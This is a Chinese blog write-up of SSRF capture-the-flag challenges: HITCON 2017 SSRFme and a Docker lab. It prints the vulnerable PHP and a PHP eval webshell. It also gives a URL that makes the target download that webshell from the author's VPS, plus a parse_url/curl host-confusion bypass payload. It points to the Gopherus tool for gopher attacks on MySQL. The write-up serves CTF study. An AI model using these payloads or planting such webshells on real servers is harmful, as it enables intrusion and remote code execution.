SSRF题目复现

最新推荐文章于 2024-05-28 15:09:40 发布
最新推荐文章于 2024-05-28 15:09:40 发布
阅读量2.6k 收藏 1
点赞数 1
分类专栏: 渗透测试 文章标签: CTF php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40909772/article/details/121403022
版权

1. [HITCON 2017] SSRFme。

题目平台地址:https://buuoj.cn/challenges
进入题目环境之后是代码审计,代码如下:

59.49.169.109 
<?php
    if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
        $http_x_headers = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
        $_SERVER['REMOTE_ADDR'] = $http_x_headers[0];
    }

    echo $_SERVER["REMOTE_ADDR"];
    
    $sandbox = "sandbox/" . md5("orange" . $_SERVER["REMOTE_ADDR"]);
    @mkdir($sandbox);
    @chdir($sandbox);

    $data = shell_exec("GET " . escapeshellarg($_GET["url"]));
    $info = pathinfo($_GET["filename"]);
    $dir  = str_replace(".", "", basename($info["dirname"]));
    @mkdir($dir);
    @chdir($dir);
    @file_put_contents(basename($info["basename"]), $data);
    highlight_file(__FILE__);
 ?>

  首先是通过$_SERVER方法获取到本机IP地址并打印,然后与orange一起进行md5加密。然后创建这个目录并进入这个目录。
  然后通过url参数输入的内容会以命令进行执行,执行的结果保存到filename参数的值命名的文件里。
  看了一下网上的WP都是构建读取readflag文件的payload,我的想法是通过自己的VPS向目标服务器写入一个一句话。在自己VPS创建以下内容文件:

<?php @eval($_POST['hacker']);?>

访问以下URL向目标写入webshell:

http://0e11c8a4-4a5c-4e0a-a533-2edd1057decc.node4.buuoj.cn:81/?url=x.x.x.x/1.txt&filename=1.php

计算出文件路径:
在这里插入图片描述
使用蚁剑连接:

http://0e11c8a4-4a5c-4e0a-a533-2edd1057decc.node4.buuoj.cn:81/sandbox/0c24a175c3390fc9d84ae7fb955ef9b8/1.php

读取readflag:
在这里插入图片描述

2.题目四连。

  题目是docker环境,docker-compose.yml文件内容如下:

version: "3"
services:
  web:
    image: registry.cn-beijing.aliyuncs.com/n1book/web-ssrf-1:latest
    depends_on: 
      - redis
      - vuln
      - mysql
    ports:
      - "8233:80"

  redis:
    image: registry.cn-beijing.aliyuncs.com/n1book/web-ssrf-2:latest

  vuln:
    image: registry.cn-beijing.aliyuncs.com/n1book/web-ssrf-3:latest
    
  mysql:
    image: registry.cn-beijing.aliyuncs.com/n1book/web-ssrf-4:latest
    environment:
      - MYSQL_RANDOM_ROOT_PASSWORD=yes

  四道题目,一道代码审计考察ssrf过滤绕过,剩余三道分别是利用ssrf攻击mysql、PHP-FPM和Redis。mysql、PHP-FPM和Redis攻击过程类似,这里只演示攻击mysql。

2.1 代码审计
<?php 
highlight_file(__FILE__);
function check_inner_ip($url) 
{ 
    $match_result=preg_match('/^(http|https)?:\/\/.*(\/)?.*$/',$url); 
    if (!$match_result) 
    { 
        die('url fomat error'); 
    } 
    try 
    { 
        $url_parse=parse_url($url); 
    } 
    catch(Exception $e) 
    { 
        die('url fomat error'); 
        return false; 
    } 
    $hostname=$url_parse['host']; 
    $ip=gethostbyname($hostname); 
    $int_ip=ip2long($ip); 
    return ip2long('127.0.0.0')>>24 == $int_ip>>24 || ip2long('10.0.0.0')>>24 == $int_ip>>24 || ip2long('172.16.0.0')>>20 == $int_ip>>20 || ip2long('192.168.0.0')>>16 == $int_ip>>16; 
} 

function safe_request_url($url) 
{ 
     
    if (check_inner_ip($url)) 
    { 
        echo $url.' is inner ip'; 
    } 
    else 
    {
        $ch = curl_init(); 
        curl_setopt($ch, CURLOPT_URL, $url); 
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
        curl_setopt($ch, CURLOPT_HEADER, 0); 
        $output = curl_exec($ch); 
        $result_info = curl_getinfo($ch); 
        if ($result_info['redirect_url']) 
        { 
            safe_request_url($result_info['redirect_url']); 
        } 
        curl_close($ch); 
        var_dump($output); 
    } 
     
} 

$url = $_GET['url']; 
if(!empty($url)){ 
    safe_request_url($url); 
} 

?>

  首先通过get方法获取参数url的用户输入,判断不为空执行safe_request_url()函数,此函数首先会调用check_inner_ip()函数,对用户输入进行判断。如果check_inner_ip()函数有返回值则打印“is inner ip”,否则向下执行crul命令。
  check_inner_ip()函数首先会使用正则判断用户输入是不是一个合法的url即是否包含url必须有的组成部分(关于这方面的介绍可以关注我下篇博客),如果用户输入合法则使用parse_url()方法解析出用户输入的URL的组成部分,然后使用$url_parse[‘host’]方法提取出host。再使用gethostbyname($hostname)方法返回一个IP,使用ip2long()方法将IP转化为长整型数字,再去判断这个IP是否是几个私网地址。
  题目说明在网站根目录下存在一个flag.php,所以我们需要构造能绕过检测函数payload去读取flag文件,构造的payload如下:

url=http://@127.0.0.1:80@baidu.com/flag.php

  此时经过检测,parse_url取到的host其实是baidu.com,而curl取到的是127.0.0.1:80,parse_url取到的host其实是baidu.com,而curl取到的是127.0.0.1:80,从而实现了读取flag。

2.2 攻击mysql

  利用gopher协议去攻击mysql,题目的mysql容器内置了抓包工具,mysql中存在一个管理员账号密码。具体怎样手工实现生成gopher协议攻击攻击我会在下篇博客讲,这道题目我们使用自动组装Gopher协议数据的工具,这是工具地址:https://github.com/tarunkant/Gopherus

安装完成后运行工具,如下命令查看帮助信息:
在这里插入图片描述
如下命令生成攻击数据:
在这里插入图片描述
进入容器使用curl命令攻击:
在这里插入图片描述

晶晶娃在战斗
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
SSRF利用总结
04-24
SSRF漏洞利用总结,类似SQL注入小计的形式,总结地比较完整。
i春秋CTF ssrfme (peal函数中get命令漏洞)命令执行 详细题解+原理 学习过程
AAAAAAAAAAAA66的博客
12-16 1384
前几天刚做一道命令执行的题目累的够呛,这会刷题又碰见一道,所以做个总结,梳理一下自己学到的各方面知识。 题目 分析 <?php $sandbox = "sandbox/" . md5("orange" . $_SERVER["REMOTE_ADDR"]); @mkdir($sandbox); @chdir($sandbox); $data = shell_exec("GET " . escapeshellarg($_GET["url"]));
以点到面的SSRF漏洞入门学习+安鸾渗透测试靶场SSRF系列题目练习 SSRF01 SSRF02 SSRF03
AAAAAAAAAAAA66的博客
02-03 1898
目录 认识 SSRF(服务器伪造) 实例 安鸾SSRF01 有时间的话可以先看看这里 前言:其实我很早就了解到了'SSRF' (服务器伪造)这个名词了,但是当时仅从字面上感觉非常难理解,看了下详细的描述也没有什么头绪,再加上没有碰到什么靶场或者CTF题目有把这个作为单独的考点,到了最后可能就放弃了对SSRF的学习。 所以这里最好从一些简单的靶场练习,帮助我们建立一点印象,再以点到面的学习,然后逐渐的掌握各种相关应用场景。大家耐心的看一遍话基本能简单的入门SSRF了。 这是我一个新手的一.
ssrf原理及ctfshow例题
最新发布
2301_80499103的博客
05-28 764
1.ssrf的原理SSRF (Server-Side Request Forgery,服务器端请求伪造) 是一种由攻击者构造请求,由服务端发起请求的安全漏洞,一般情况下,SSRF攻击的目标是外网无法访问的内网系统,也正因为请求是由服务端发起的,所以服务端能请求到与自身相连而与外网隔绝的内部系统。也就是说可以利用一个网络请求的服务,当作跳板进行攻击。攻击者利用了可访问Web服务器(A)的特定功能 构造恶意payload;
CTF web题总结--SSRF
热门推荐
bob的博客
08-29 1万+
SSRF(Server-Side Request Forgery:服务器端请求伪造)是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内网。(正因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内网) SSRF形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤和限制。即SSRF漏洞就是通过篡改 获取
nssctfSSRF刷题记录
夜未至
06-23 881
file_get_contents — 将整个文件读入一个字符串。
ssrf漏洞复现
m0_55631425的博客
03-27 2779
漏洞复现 cd /usr/local ls cd vulhub-master cd weblogic cd ssrf docker-compose up -d ifconfig查询下本机IP 访问http://192.168.106.139:7001/uddiexplorer/SearchPublicRegistries.jsp ,出现以下界面 这里可能会遇到访问不上的情况,发现物理机无法ping通虚拟机,虚拟机能ping通物理机 只需给VMnet8的虚拟网卡禁用再启用就行 历经千辛万苦终于进来了 1、
关于BMZCTF hitcon_2017_ssrfme的解法
永远是少年
01-12 837
在BMZCTF中,有一道题是hitcon_2017_ssrfme
WebLogic SSRF 及漏洞修复
11-25
WebLogic SSRF 及漏洞修复方法 CVE-2014-4210 10.0.2,10.3.6
SSRF bible. Cheatsheet
08-06
SSRF bible. Cheatsheet SSRF attack and sockets presentation.
SSRF_ex:SSRF漏洞测试、利用 SSRF vulnerability testing and utilization
05-08
SSRF_exSSRF漏洞测试、利用 SSRF vulnerability testing and utilizationSSRF[+] 服务端请求伪造,当作跳板攻击内网服务[+] 扫描内部网络、服务[+] 访问本机敏感文件[+] 向特定端口发送数据包、payload.├── ...
第一节 SSRF原理介绍-01
09-15
SSRF漏洞原理介绍 SSRF(Server-Side Request Forgery,服务端请求伪造)是一种构造请求,由服务端发起请求的安全漏洞。客户端服务端内网资源一般情况下,SSRF的目标就是与外部隔离的内网资源。 SSRF漏洞定义: ...
5位可控字符下的命令执行
qq_45521281的博客
05-03 1600
遇到了这样一个题,这题是一个特别的命令执行题, 首先进去首页之后发现以下源码: <?php $sandbox = '/www/sandbox/' . md5("orange" . $_SERVER['REMOTE_ADDR']); @mkdir($sandbox); @chdir($sandbox); if (isset($_GET['cmd']) &...
服务端请求伪造(SSRF)及漏洞复现
来日可期的博客
09-04 3722
服务端请求伪造(Server-Side Request Forgery,简称SSRF)是一种常见的安全漏洞,攻击者可以通过该漏洞使服务器发起未经授权的请求,甚至可以访问内部资源。攻击者可以利用SSRF获取敏感信息、执行未经授权的操作或者进行其它攻击。
SSRF漏洞的复现
cxrpty的博客
02-26 2018
实验环境:Ubuntu虚拟机上安装vulhub漏洞环境 实验原理:由于服务端提供了从其他服务器应用获取数据的功能,并且没有对目标地址做过滤与限制,比如从指定URL地址获取网页文本内容,加载指定地址的图片,下载等等。 实验步骤: 1.进入vulhub-master/weblogic/ssrf目录,输入docker-compose up -d启动环境 2.输入ifconfig查看ip ...
命令注入突破长度限制 | 从CTF题目讲起
纸房子
12-03 7075
在命令注入中往往会存在注入命令的长度过短的情况,无法将全部命令完全的输入进去,这种情况下就需要我们来想办法突破系统命令长度的限制。我们从三道CTF题目来讲解一下这种渗透策略。一.BabyfirstSovled: 33 / 969 Difficulty: ★★ Tag: WhiteBox, PHP, Command InjectionIdeaUse NewLine to bypass regula
end的学习 21-4-20
qq_45781155的博客
04-20 136
mkdir 创建权限为777的目录:mkdir -m 777 test3 通过 mkdir 命令可以实现在指定位置创建以 DirName(指定的文件名)命名的文件夹或目录。要创建文件夹或目录的用户必须对所创建的文件夹的父文件夹具有写权限。并且,所创建的文件夹(目录)不能与其父目录(即父文件夹)中的文件名重名,即同一个目录下不能有同名的(区分大小写)。 chdir() chdir() 函数改变当前的目录。 <?php // Get current directory echo getcwd() .
php如何打网页ctf,【CTF 攻略】如何绕过四个字符限制getshell
weixin_28729331的博客
03-17 670
预估稿费:400RMB投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿前言本文主要整理如何巧用Linux命令绕过命令注入点的字符数量限制,内容围绕HITCON CTF 2017 的两道题展开,先讲五个字符的限制,再讲四个字符的。在此感谢下主办方分享这么有趣的点子。热身问题的起源是 HITCON CTF 2017 的 BabyFirst Revenge 题,题目的主要代码如下:B...
(4)5位可控字符下的任意命令执行-----另一种解题方法
大方子
11-06 3297
有道分享链接:https://note.youdao.com/ynoteshare1/index.html?id=55e53db4f857d81515e57e104777b88b&type=note 前言: 题目是hitcon-ctf-2017的babyfirst-revenge,之前是针对babyfirst-revenge-v2来进行学习研究的 <?php ...
vulhub weblogic ssrf复现
08-31
要在vulhub上复现WebLogic的SSRF漏洞,您可以按照以下步骤进行操作: 1. 首先,确保您已经安装了Docker和Docker Compose,这样您就可以在本地运行vulhub环境。如果您还没有安装它们,请先安装。 2. 下载vulhub的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

晶晶娃在战斗

你的鼓励将是我创作的最大动力!

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值